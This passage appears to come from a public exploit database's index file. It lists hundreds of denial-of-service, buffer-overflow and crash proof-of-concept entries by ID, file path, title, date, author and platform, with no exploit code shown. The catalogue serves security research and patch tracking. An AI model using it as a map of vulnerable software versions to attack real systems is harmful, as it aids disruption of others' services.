HTTPD - 'CMDIS.dll' Remote Buffer Overflow",2005-04-08,"Tan Chew Keong",dos,windows, +25383,exploits/windows/dos/25383.pl,"Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)",2005-04-12,"Song Liu",dos,windows, +25387,exploits/multiple/dos/25387.txt,"Multiple Vendor ICMP Implementation - Spoofed Source Quench Packet Denial of Service",2005-04-12,"Fernando Gont",dos,multiple, +25388,exploits/multiple/dos/25388.txt,"Multiple Vendor ICMP Implementation - Malformed Path MTU Denial of Service",2005-04-12,"Fernando Gont",dos,multiple, +25389,exploits/multiple/dos/25389.txt,"Multiple Vendor ICMP Message Handling - Denial of Service",2005-04-12,"Fernando Gont",dos,multiple, +25393,exploits/multiple/dos/25393.txt,"XAMPP - Insecure Default Password Disclosure",2005-04-12,"Morning Wood",dos,multiple, +25402,exploits/hardware/dos/25402.txt,"LG U8120 Mobile Phone - '.MIDI' File Remote Denial of Service",2005-04-13,"Luca Ercoli",dos,hardware, +25408,exploits/windows/dos/25408.pl,"Microsoft Windows Media Player 11.0.0 - '.wav' Crash (PoC)",2013-05-13,Asesino04,dos,windows, +25418,exploits/windows/dos/25418.py,"MiniWeb HTTP Server 300 - Crash (PoC)",2013-05-13,dmnt,dos,windows, +25429,exploits/linux/dos/25429.c,"Libsafe 2.0 - Multi-threaded Process Race Condition Security Bypass",2005-04-15,Overflow.pl,dos,linux, +25439,exploits/multiple/dos/25439.c,"Multiple Vendor - TCP Session Acknowledgement Number Denial of Service",2004-12-13,"Antonio M. D. S. Fortes",dos,multiple, +25443,exploits/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow (SEH)",2013-05-14,ariarat,dos,windows, +25465,exploits/linux/dos/25465.txt,"Logwatch 2.6 Secure Script - Denial of Service",2005-04-20,anonymous,dos,linux, +25470,exploits/multiple/dos/25470.txt,"Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service",2005-04-20,"Adam Baldwin",dos,multiple, +25472,exploits/windows/dos/25472.py,"Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of Service",2013-05-15,Sapling,dos,windows, +25499,exploits/linux/dos/25499.py,"Nginx 1.3.9 < 1.4.0 - Denial of Service (PoC)",2013-05-17,"Mert SARICA",dos,linux, +25525,exploits/linux/dos/25525.c,"Affix Bluetooth Protocol Stack 3.1/3.2 - Signed Buffer Index (1)",2005-04-25,kf,dos,linux, +25527,exploits/linux/dos/25527.txt,"ImageMagick 6.x - '.PNM' Image Decoding Remote Buffer Overflow",2005-04-25,"Damian Put",dos,linux, +25584,exploits/multiple/dos/25584.txt,"Mtp-Target Server 1.2.2 - Memory Corruption",2005-05-02,"Luigi Auriemma",dos,multiple, +25611,exploits/windows/dos/25611.txt,"Microsoft Windows - Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",dos,windows, +25629,exploits/windows/dos/25629.pl,"Orenosv HTTP/FTP Server 0.8.1 - FTP Commands Remote Buffer Overflow",2008-05-08,Samsta,dos,windows, +25631,exploits/windows/dos/25631.txt,"Orenosv HTTP/FTP Server 0.8.1 - 'CGISSI.exe' Remote Buffer Overflow",2005-05-09,"Tan Chew Keong",dos,windows, +25633,exploits/windows/dos/25633.txt,"AOL Instant Messenger 4.x/5.x - Smiley Icon Location Remote Denial of Service",2005-05-09,fjlj@wvi.com,dos,windows, +25647,exploits/linux/dos/25647.sh,"Linux Kernel 2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow",2005-05-11,"Paul Starzetz",dos,linux, +25658,exploits/windows/dos/25658.txt,"Yahoo! Messenger 5.x/6.0 - URL Handler Remote Denial of Service",2005-05-13,"Torseq Tech",dos,windows, +25680,exploits/windows/dos/25680.txt,"War Times - Remote Game Server Denial of Service",2005-05-17,"Luigi Auriemma",dos,windows, +25692,exploits/multiple/dos/25692.txt,"Warrior Kings: Battles 1.23 - Remote Denial of Service",2005-05-23,"Luigi Auriemma",dos,multiple, +25699,exploits/windows/dos/25699.txt,"Gearbox Software Halo Game Server 1.06/1.07 - Infinite Loop Denial of Service",2005-05-24,"Luigi Auriemma",dos,windows, +25711,exploits/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer - Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",dos,hardware, +25712,exploits/windows/dos/25712.txt,"SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution",2013-05-26,rgod,dos,windows, +25714,exploits/windows/dos/25714.txt,"SAS Integration Technologies Client 9.31_M1 'SASspk.dll' - Stack Based Overflow",2013-05-26,LiquidWorm,dos,windows, +25719,exploits/windows/dos/25719.txt,"Trend Micro DirectPass 1.5.0.1060 - Multiple Software Vulnerabilities",2013-05-26,Vulnerability-Lab,dos,windows, +25736,exploits/hardware/dos/25736.txt,"Nokia 9500 - vCard Viewer Remote Denial of Service",2005-05-26,"Marek Bialoglowy",dos,hardware, +25737,exploits/windows/dos/25737.txt,"Microsoft Windows 98SE - 'User32.dll' Icon Handling Denial of Service",2005-05-26,klistas,dos,windows, +25752,exploits/php/dos/25752.txt,"PHPMailer 1.7 - 'Data()' Remote Denial of Service",2005-05-28,"Mariano Nunez Di Croce",dos,php, +25757,exploits/multiple/dos/25757.txt,"Firefly Studios Stronghold 2 - Remote Denial of Service",2005-05-28,"Luigi Auriemma",dos,multiple, +25782,exploits/windows/dos/25782.txt,"HP OpenView Radia 2.0/3.1/4.0 - Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities",2005-06-01,"John Cartwright",dos,windows, +25791,exploits/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 - Remote Denial of Service",2005-06-06,"Luigi Auriemma",dos,multiple, +25807,exploits/aix/dos/25807.txt,"IBM AIX 5.x - 'Invscout' Local Buffer Overflow",2005-06-09,"Computer Academic Underground",dos,aix, +25809,exploits/osx/dos/25809.py,"CodeBlocks 12.11 (OSX) - Crash (PoC)",2013-05-29,ariarat,dos,osx, +25837,exploits/linux/dos/25837.txt,"Monkey HTTPd 1.1.1 - Crash (PoC)",2013-05-30,"Doug Prostko",dos,linux, +26292,exploits/osx/dos/26292.html,"Microsoft Internet Explorer 5.2.3 for Mac OS - Denial of Service",2005-08-22,"Mella Marco",dos,osx, +25852,exploits/multiple/dos/25852.py,"ModSecurity - Remote Null Pointer Dereference",2013-05-31,"Younes JAAIDI",dos,multiple, +25911,exploits/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service",2005-06-28,fRoGGz,dos,windows, +25921,exploits/windows/dos/25921.txt,"Raven Software Soldier Of Fortune 2 - Ignore Command Remote Denial of Service",2005-06-29,"Luigi Auriemma",dos,windows, +25936,exploits/windows/dos/25936.pl,"PlanetDNS PlanetFileServer - Remote Buffer Overflow",2005-06-28,fRoGGz,dos,windows, +25943,exploits/linux/dos/25943.txt,"OFTPD 0.3.x - User Command Buffer Overflow",2005-07-06,new.security@gmail.com,dos,linux, +25962,exploits/asp/dos/25962.xml,"Microsoft ASP.NET 1.0/1.1 - RPC/Encoded Remote Denial of Service",2005-07-12,"Bryan Sullivan",dos,asp, +25967,exploits/hardware/dos/25967.txt,"Cisco CallManager 1.0/2.0/3.x/4.0 - CTI Manager Remote Denial of Service",2005-07-12,"Jeff Fay",dos,hardware, +25972,exploits/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",dos,windows, +25974,exploits/osx/dos/25974.txt,"Apple Mac OSX Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",dos,osx, +25991,exploits/windows/dos/25991.txt,"Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering Buffer Overflow",2005-07-15,"Michal Zalewski",dos,windows, +25992,exploits/windows/dos/25992.txt,"Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering CMP Fencepost Denial of Service",2005-07-15,"Michal Zalewski",dos,windows, +26005,exploits/windows/dos/26005.pl,"Alt-N MDaemon 8.0 - IMAP Server CREATE Remote Buffer Overflow",2005-07-19,kcope,dos,windows, +26010,exploits/windows/dos/26010.py,"Quick TFTP Server Pro 2.2 - Denial of Service",2013-06-07,npn,dos,windows, +26076,exploits/hardware/dos/26076.py,"Cisco ASA < 8.4.4.6 < 8.2.5.32 - Ethernet Information Leak",2013-06-10,prdelka,dos,hardware, +26128,exploits/osx/dos/26128.html,"Apple Safari 1.3 Web Browser - JavaScript Invalid Address Denial of Service",2005-08-09,"Patrick Webster",dos,osx, +26130,exploits/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,dos,windows, +26133,exploits/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,dos,windows,21 +26137,exploits/windows/dos/26137.py,"Syslog Server 1.2.3 - Crash (PoC)",2013-06-12,npn,dos,windows, +26138,exploits/hardware/dos/26138.txt,"Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow",2013-06-12,"Core Security",dos,hardware,554 +26139,exploits/windows/dos/26139.txt,"Gaim AIM/ICQ Protocols - Multiple Vulnerabilities",2005-08-10,"Brandon Perry",dos,windows, +26145,exploits/multiple/dos/26145.c,"Wyse Winterm 1125SE 4.2/4.4 - Remote Denial of Service",2005-08-10,"Piotr Chytla",dos,multiple, +26173,exploits/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Sánchez",dos,windows, +26194,exploits/windows/dos/26194.txt,"LeapFTP Client 2.7.3/2.7.4 - '.LSQ' File Remote Buffer Overflow",2005-08-24,Sowhat,dos,windows, +26214,exploits/windows/dos/26214.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow",2013-06-14,ariarat,dos,windows, +26216,exploits/windows/dos/26216.txt,"Indiatimes Messenger 6.0 - Remote Buffer Overflow",2005-08-31,ViPeR,dos,windows, +26219,exploits/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service",2005-09-02,"Critical Security",dos,windows, +26220,exploits/windows/dos/26220.c,"FileZilla 2.2.15 - FTP Client Hard-Coded Cipher Key",2005-09-02,m123303@richmond.ac.uk,dos,windows, +26233,exploits/hardware/dos/26233.txt,"Cisco IOS 12.x - Firewall Authentication Proxy Buffer Overflow",2005-09-07,Markus,dos,hardware, +26248,exploits/linux/dos/26248.sh,"Linux Kernel 2.6.x - SCSI ProcFS Denial of Service",2005-09-09,anonymous,dos,linux, +26249,exploits/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service",2005-09-09,Shiraishi.M,dos,linux, +26251,exploits/linux/dos/26251.c,"Snort 2.x - PrintTcpOptions Remote Denial of Service",2005-09-12,"VulnFact Security Labs",dos,linux, +26271,exploits/osx/dos/26271.txt,"Apple Safari 1.x/2.0.1 - Data URI Memory Corruption",2005-09-17,"Jonathan Rockway",dos,osx, +26301,exploits/windows/dos/26301.txt,"Novell Groupwise Client 6.5.3 - Local Integer Overflow",2005-09-27,"Francisco Amato",dos,windows, +26331,exploits/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus - TLS Listener Remote Denial of Service",2005-10-07,"Alexander Kornbrust",dos,multiple, +26322,exploits/windows/dos/26322.pl,"MusicBee 2.0.4663 - '.m3u' Denial of Service",2013-06-19,Chako,dos,windows, +26325,exploits/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 - iFrame Handling Denial of Service",2005-10-05,"Tom Ferris",dos,multiple, +26336,exploits/multiple/dos/26336.txt,"Oracle Forms - Servlet TLS Listener Remote Denial of Service",2005-10-07,"Alexander Kornbrust",dos,multiple, +26340,exploits/linux/dos/26340.c,"Up-IMAPProxy 1.2.3/1.2.4 - Multiple Unspecified Remote Format String Vulnerabilities",2005-10-10,"Steve Kemp",dos,linux, +26341,exploits/windows/dos/26341.txt,"Microsoft Windows XP/2000/2003 - MSDTC TIP Denial of Service (MS05-051)",2005-10-11,anonymous,dos,windows, +26342,exploits/linux/dos/26342.txt,"RARLAB WinRar 2.90/3.x - UUE/XXE Invalid Filename Error Message Format String",2005-10-11,"Tan Chew Keong",dos,linux, +26382,exploits/linux/dos/26382.c,"Linux Kernel 2.6.x - IPv6 Local Denial of Service",2005-10-20,"Rémi Denis-Courmont",dos,linux, +26413,exploits/windows/dos/26413.py,"PEiD 0.95 - Memory Corruption (PoC)",2013-06-24,"Debasish Mandal",dos,windows, +26450,exploits/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service (1)",2013-06-26,Chako,dos,windows,21 +26457,exploits/windows/dos/26457.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (1)",2005-11-01,ad@class101.org,dos,windows, +26489,exploits/linux/dos/26489.c,"Linux Kernel 2.6.x - Sysctl Unregistration Local Denial of Service",2005-11-09,"Rémi Denis-Courmont",dos,linux, +26517,exploits/windows/dos/26517.txt,"Microsoft PowerPoint 2007 - Crash (PoC)",2013-07-01,Asesino04,dos,windows, +26519,exploits/windows/dos/26519.py,"AVS Media Player 4.1.11.100 - '.ac3' Denial of Service",2013-07-01,metacom,dos,windows, +26526,exploits/windows/dos/26526.py,"VideoLAN VLC Media Player 2.0.7 - '.png' Crash (PoC)",2013-07-01,"Kevin Fujimoto",dos,windows, +26548,exploits/hardware/dos/26548.pl,"Cisco PIX - TCP SYN Packet Denial of Service",2005-11-22,"Janis Vizulis",dos,hardware, +26555,exploits/windows/dos/26555.txt,"Opera 12.15 - vtable Corruption",2013-07-02,echo,dos,windows, +26557,exploits/windows/dos/26557.txt,"Winamp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",dos,windows, +26558,exploits/windows/dos/26558.txt,"Winamp 5.63 - Stack Based Buffer Overflow",2013-07-02,"Julien Ahrens",dos,windows, +26575,exploits/windows/dos/26575.txt,"MailEnable 1.1/1.7 - IMAP Rename Request Remote Denial of Service",2005-11-23,"Josh Zlatin-Amishav",dos,windows, +26578,exploits/windows/dos/26578.py,"Realtek Sound Manager AvRack - '.wav' Crash (PoC)",2013-07-03,Asesino04,dos,windows, +26601,exploits/linux/dos/26601.pl,"Unalz 0.x - Archive Filename Buffer Overflow",2005-11-28,"Ulf Harnhammar",dos,linux, +26648,exploits/linux/dos/26648.c,"Linux Kernel 2.6.x - Time_Out_Leases PrintK Local Denial of Service",2005-11-29,"Avi Kivity",dos,linux, +26665,exploits/windows/dos/26665.pl,"pcAnywhere 8.0/9.0/11.x - Authentication Denial of Service",2006-01-17,"David Maciejak",dos,windows, +26666,exploits/linux/dos/26666.c,"CenterICQ 4.20/4.5 - Packet Handling Remote Denial of Service",2005-11-29,"Wernfried Haas",dos,linux, +26690,exploits/windows/dos/26690.c,"Microsoft Windows XP/2000/2003 - CreateRemoteThread Local Denial of Service",2005-12-01,"Nima Salehi",dos,windows, +26710,exploits/multiple/dos/26710.txt,"Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service",2013-07-09,"SEC Consult",dos,multiple, +26733,exploits/windows/dos/26733.py,"Jolix Media Player 1.1.0 - '.m3u' Denial of Service",2013-07-10,IndonesiaGokilTeam,dos,windows, +26749,exploits/linux/dos/26749.c,"Linux Kernel 2.6.x - File Lock Lease Local Denial of Service",2005-12-29,"J. Bruce Fields",dos,linux, +26754,exploits/hardware/dos/26754.txt,"Check Point VPN-1 SecureClient 4.0 < 4.1 - Policy Bypass",2005-12-07,"Viktor Steinmann",dos,hardware, +26762,exploits/multiple/dos/26762.html,"Mozilla Firefox 0.x/1.x - Large History File Buffer Overflow",2005-12-08,ZIPLOCK,dos,multiple, +26769,exploits/windows/dos/26769.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption",2005-12-08,fearwall,dos,windows, +26776,exploits/windows/dos/26776.txt,"Sights 'N Sounds Streaming Media Server 2.0.3 - 'SWS.exe' Buffer Overflow",2005-12-12,dr_insane,dos,windows, +26779,exploits/windows/dos/26779.txt,"Alt-N MDaemon WorldClient 8.1.3 - Denial of Service",2005-12-12,dr_insane,dos,windows, +26802,exploits/hardware/dos/26802.py,"Tri-PLC Nano-10 r81 - Denial of Service",2013-07-13,Sapling,dos,hardware, +26811,exploits/linux/dos/26811.c,"Linux Kernel 2.6.x - INVALIDATE_INODE_PAGES2 Local Integer Overflow",2005-12-13,"Oleg Drokin",dos,linux, +26816,exploits/windows/dos/26816.pl,"AppServ Open Project 2.5.3 - Remote Denial of Service",2005-12-14,Rozor,dos,windows, +26825,exploits/hardware/dos/26825.txt,"Linksys Routers - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",dos,hardware, +26833,exploits/hardware/dos/26833.txt,"Cisco Catalyst Switches (Multiple Devices) - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",dos,hardware, +26834,exploits/hardware/dos/26834.txt,"Westell Versalink 327W - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",dos,hardware, +26835,exploits/hardware/dos/26835.txt,"Scientific Atlanta DPX2100 Cable Modem - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",dos,hardware, +26869,exploits/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Memory Corruption (MS06-012)",2005-12-19,ad@heapoverflow.com,dos,windows, +26886,exploits/linux/dos/26886.pl,"Squid 3.3.5 - Denial of Service (PoC)",2013-07-16,kingcope,dos,linux, +26887,exploits/linux/dos/26887.rb,"rpcbind - CALLIT procedure UDP Crash (PoC)",2013-07-16,"Sean Verity",dos,linux, +26891,exploits/windows/dos/26891.py,"Light Audio Mixer 1.0.12 - '.wav' Crash (PoC)",2013-07-16,ariarat,dos,windows, +26892,exploits/windows/dos/26892.py,"Kate's Video Toolkit 7.0 - '.wav' Crash (PoC)",2013-07-16,ariarat,dos,windows, +26915,exploits/linux/dos/26915.txt,"Blender BlenLoader 2.x - File Processing Integer Overflow",2005-12-20,"Damian Put",dos,linux, +26922,exploits/multiple/dos/26922.pl,"Interaction SIP Proxy 3.0 - Remote Heap Corruption Denial of Service",2005-12-21,"Behrang Fouladi",dos,multiple, +26951,exploits/windows/dos/26951.py,"Microsoft Windows Movie Maker 2.1.4026.0 - '.wav' Crash (PoC)",2013-07-18,ariarat,dos,windows, +26967,exploits/multiple/dos/26967.txt,"httprint 202.0 - HTTP Response Server Field Overflow Denial of Service",2005-12-22,"Mariano Nunez Di Croce",dos,multiple, +26971,exploits/osx/dos/26971.txt,"Apple Mac OSX - KHTMLParser Remote Denial of Service",2005-12-22,"Tom Ferris",dos,osx, +26985,exploits/windows/dos/26985.txt,"Microsoft Internet Explorer 5.0.1 - HTML Parsing Denial of Service",2005-12-27,"Christian Deneke",dos,windows, +27010,exploits/windows/dos/27010.txt,"VbsEdit 5.9.3 - '.smi' Buffer Overflow",2013-07-22,d3b4g,dos,windows, +27026,exploits/multiple/dos/27026.txt,"Intel Graphics Accelerator Driver - Remote Denial of Service",2006-01-03,"Sumit Siddharth",dos,multiple, +27031,exploits/linux/dos/27031.c,"Linux Kernel 2.6.x - SET_MEMPOLICY Local Denial of Service",2006-01-04,"Doug Chapman",dos,linux, +27043,exploits/hardware/dos/27043.py,"Samsung PS50C7700 TV - Denial of Service",2013-07-23,"Malik Mesellem",dos,hardware,5600 +27047,exploits/windows/dos/27047.txt,"Artweaver 3.1.5 - '.awd' Buffer Overflow",2013-07-23,"Core Security",dos,windows, +27049,exploits/windows/dos/27049.txt,"XnView 2.03 - '.pct' Buffer Overflow",2013-07-23,"Core Security",dos,windows, +27050,exploits/windows/dos/27050.txt,"Microsoft DirectShow - Arbitrary Memory Overwrite (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",dos,windows, +27051,exploits/windows/dos/27051.txt,"Microsoft Windows - Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,dos,windows, +27055,exploits/windows/dos/27055.txt,"Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,dos,windows, +27069,exploits/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x - PictureViewer '.JPEG'/.PICT' File Buffer Overflow",2006-01-11,"Dennis Rand",dos,windows, +27082,exploits/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed .IMG / .XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",dos,windows, +27089,exploits/windows/dos/27089.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (1)",2006-01-11,ZwelL,dos,windows, +27090,exploits/windows/dos/27090.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (2)",2006-01-15,ZwelL,dos,windows, +27094,exploits/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 - BlueTooth Stack Object Push Buffer Overflow",2006-01-16,"Kevin Finisterre",dos,multiple, +27101,exploits/windows/dos/27101.txt,"Computer Associates Unicenter 6.0 - Remote Control DM Primer Remote Denial of Service",2006-01-17,Karma,dos,windows, +27108,exploits/multiple/dos/27108.txt,"Dual DHCP DNS Server 1.0 - DHCP Options Remote Buffer Overflow",2006-01-07,"Luigi Auriemma",dos,multiple, +27113,exploits/windows/dos/27113.c,"BitComet 0.60 - '.Torrent' File Handling Remote Buffer Overflow",2006-01-19,"Dejun Meng",dos,windows, +27131,exploits/hardware/dos/27131.py,"Galil-RIO Modbus - Denial of Service",2013-07-27,Sapling,dos,hardware, +27140,exploits/multiple/dos/27140.txt,"Exiv2 - Corrupted EXIF Data Denial of Service",2006-01-26,"Maciek Wierciski",dos,multiple, +27144,exploits/linux/dos/27144.py,"CommuniGate Pro 5.0.6 - Server LDAP Denial of Service",2006-01-28,"Evgeny Legerov",dos,linux, +27145,exploits/linux/dos/27145.txt,"GNOME Evolution 2.2.3/2.3.x - Inline XML File Attachment Buffer Overflow",2006-01-28,"Mike Davis",dos,linux, +27159,exploits/multiple/dos/27159.txt,"Fcron 3.0 - Convert-FCronTab Local Buffer Overflow",2006-02-01,"Adam Zabrocki",dos,multiple, +27171,exploits/multiple/dos/27171.txt,"Sun ONE Directory Server 5.2 - Remote Denial of Service",2006-02-08,"Evgeny Legerov",dos,multiple, +27196,exploits/multiple/dos/27196.txt,"IBM Tivoli Directory Server 6.0 - LDAP Memory Corruption",2006-02-11,"Evgeny Legerov",dos,multiple, +27210,exploits/multiple/dos/27210.txt,"eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String Denial of Service",2006-02-14,ZwelL,dos,multiple, +27211,exploits/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities",2006-02-14,ZwelL,dos,multiple, +27212,exploits/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 - LDAP Memory Corruption",2006-02-14,"Evgeny Legerov",dos,multiple, +27232,exploits/hardware/dos/27232.txt,"Nokia N70 - L2CAP Packets Remote Denial of Service",2006-02-15,"Pierre Betouin",dos,hardware, +27241,exploits/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service",2006-02-16,l0om,dos,hardware, +27246,exploits/linux/dos/27246.txt,"Mozilla Thunderbird 1.5 - Address Book Import Remote Denial of Service",2006-02-17,DrFrancky,dos,linux, +27253,exploits/linux/dos/27253.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Denial of Service",2006-02-21,"Yuan Qi",dos,linux, +27257,exploits/linux/dos/27257.html,"Mozilla (Multiple Products) - iFrame JavaScript Execution",2006-02-22,"Georgi Guninski",dos,linux, +27258,exploits/asp/dos/27258.txt,"Ipswitch WhatsUp Professional 2006 - Remote Denial of Service",2006-02-22,"Josh Zlatin-Amishav",dos,asp, +27273,exploits/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash (PoC)",2013-08-02,d3b4g,dos,windows, +27292,exploits/windows/dos/27292.py,"EchoVNC Viewer - Remote Denial of Service",2013-08-02,Z3r0n3,dos,windows, +27317,exploits/windows/dos/27317.txt,"StarUML - 'WinGraphviz.dll' ActiveX Buffer Overflow",2013-08-03,d3b4g,dos,windows, +27329,exploits/windows/dos/27329.txt,"Alt-N MDaemon 8.1.1 IMAP Server - Remote Format String",2006-02-27,Nemesis,dos,windows, +27365,exploits/multiple/dos/27365.txt,"Monopd 0.9.3 - Remote Denial of Service",2006-03-06,"Luigi Auriemma",dos,multiple, +27377,exploits/windows/dos/27377.txt,"Easy File Sharing Web Server 3.2 - Format String Denial of Service",2006-03-09,"Revnic Vasile",dos,windows, +27407,exploits/windows/dos/27407.pl,"UnrealIRCd 3.x - Remote Denial of Service",2006-03-09,"Brandon Milner",dos,windows, +27418,exploits/windows/dos/27418.txt,"Firebird 1.5 - Inet_Server Local Buffer Overflow",2006-03-13,"Joxean Koret",dos,windows, +27420,exploits/multiple/dos/27420.c,"ENet - Multiple Denial of Service Vulnerabilities",2006-03-13,"Luigi Auriemma",dos,multiple, +27421,exploits/multiple/dos/27421.txt,"GGZ Gaming Zone 0.0.12 - Multiple Denial of Service Vulnerabilities",2006-03-14,"Luigi Auriemma",dos,multiple, +27425,exploits/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow",2006-03-16,"Josh Bressers",dos,linux, +27460,exploits/multiple/dos/27460.pl,"RealNetworks (Multiple Products) - Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",dos,multiple, +27474,exploits/multiple/dos/27474.txt,"LibVC - '.VCard' 003 Processing Buffer Overflow",2006-03-21,trew,dos,multiple, +27476,exploits/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow",2006-03-27,"Dinis Cruz",dos,windows, +27727,exploits/windows/dos/27727.txt,"Microsoft Internet Explorer 6 - Nested OBJECT Tag Memory Corruption",2006-04-22,"Michal Zalewski",dos,windows, +27547,exploits/multiple/dos/27547.txt,"Zdaemon 1.8.1 - Multiple Vulnerabilities",2006-03-31,"Luigi Auriemma",dos,multiple, +27553,exploits/windows/dos/27553.py,"OneHTTPD 0.7 - Denial of Service",2013-08-13,superkojiman,dos,windows,8080 +27566,exploits/multiple/dos/27566.txt,"Doomsday 1.8/1.9 - Multiple Remote Format String Vulnerabilities",2005-04-03,"Luigi Auriemma",dos,multiple, +27581,exploits/linux/dos/27581.txt,"Tony Cook Imager 0.4x - '.JPEG' / '.TGA' Images Denial of Service",2006-04-07,"Kjetil Kjernsmo",dos,linux, +27635,exploits/linux/dos/27635.txt,"Mozilla Firefox 1.0.x/1.5 - HTML Parsing Null Pointer Dereference Denial of Service",2006-04-13,"Thomas Waldegger",dos,linux, +27639,exploits/multiple/dos/27639.txt,"W3C Amaya 9.4 - textarea rows Attribute Value Overflow",2006-04-13,"Thomas Waldegger",dos,multiple, +27640,exploits/multiple/dos/27640.txt,"W3C Amaya 9.4 - legend color Attribute Value Overflow",2006-04-13,"Thomas Waldegger",dos,multiple, +27641,exploits/linux/dos/27641.txt,"Opera Web Browser 8.52 - Stylesheet Attribute Buffer Overflow",2006-04-13,"SEC Consult",dos,linux, +27969,exploits/multiple/dos/27969.c,"Quake 3 Engine - 'CL_ParseDownload' Remote Buffer Overflow",2006-06-05,"Luigi Auriemma",dos,multiple, +27971,exploits/windows/dos/27971.txt,"Microsoft Internet Explorer 5.0.1 - Frameset Memory Corruption",2006-06-05,Kil13r,dos,windows, +27668,exploits/multiple/dos/27668.c,"Neon Responders 5.4 - Remote Clock Synchronization Denial of Service",2006-04-10,"Stefan Lochbihler",dos,multiple, +27670,exploits/linux/dos/27670.txt,"Xine 0.9/1.0 - Playlist Handling Remote Format String",2006-04-18,c0ntexb,dos,linux, +27700,exploits/windows/dos/27700.py,"VideoLAN VLC Media Player 2.0.8 - '.m3u' Local Crash (PoC)",2013-08-19,Asesino04,dos,windows, +27714,exploits/osx/dos/27714.txt,"Apple Mac OSX 10.x - LZWDecodeVector '.tiff' Overflow",2006-04-20,"Tom Ferris",dos,osx, +27715,exploits/osx/dos/27715.txt,"Apple Mac OSX 10.x - '.zip' BOMStackPop()' Overflow",2006-04-20,"Tom Ferris",dos,osx, +27723,exploits/linux/dos/27723.txt,"Yukihiro Matsumoto Ruby 1.x - XMLRPC Server Denial of Service",2006-04-21,"Tanaka Akira",dos,linux, +27730,exploits/multiple/dos/27730.py,"Lotus Domino 7.0.x/8.0/8.5 - LDAP Message Remote Denial of Service",2006-04-24,"Evgeny Legerov",dos,multiple, +27745,exploits/windows/dos/27745.txt,"Outlook Express 5.5/6.0 / Windows Mail - MHTML URI Handler Information Disclosure",2006-04-27,codedreamer,dos,windows, +27749,exploits/hardware/dos/27749.rb,"Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service",2013-08-21,"Arash Abedian",dos,hardware, +27762,exploits/linux/dos/27762.txt,"LibTiff 3.x - Multiple Denial of Service Vulnerabilities",2006-04-28,"Tavis Ormandy",dos,linux, +27764,exploits/linux/dos/27764.txt,"LibTiff 3.x - TIFFFetchData Integer Overflow",2006-04-28,"Tavis Ormandy",dos,linux, +27765,exploits/linux/dos/27765.txt,"LibTiff 3.x - Double-Free Memory Corruption",2008-04-28,"Tavis Ormandy",dos,linux, +27856,exploits/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",dos,linux, +27775,exploits/hardware/dos/27775.py,"NETGEAR ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",dos,hardware, +27778,exploits/linux/dos/27778.txt,"Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer 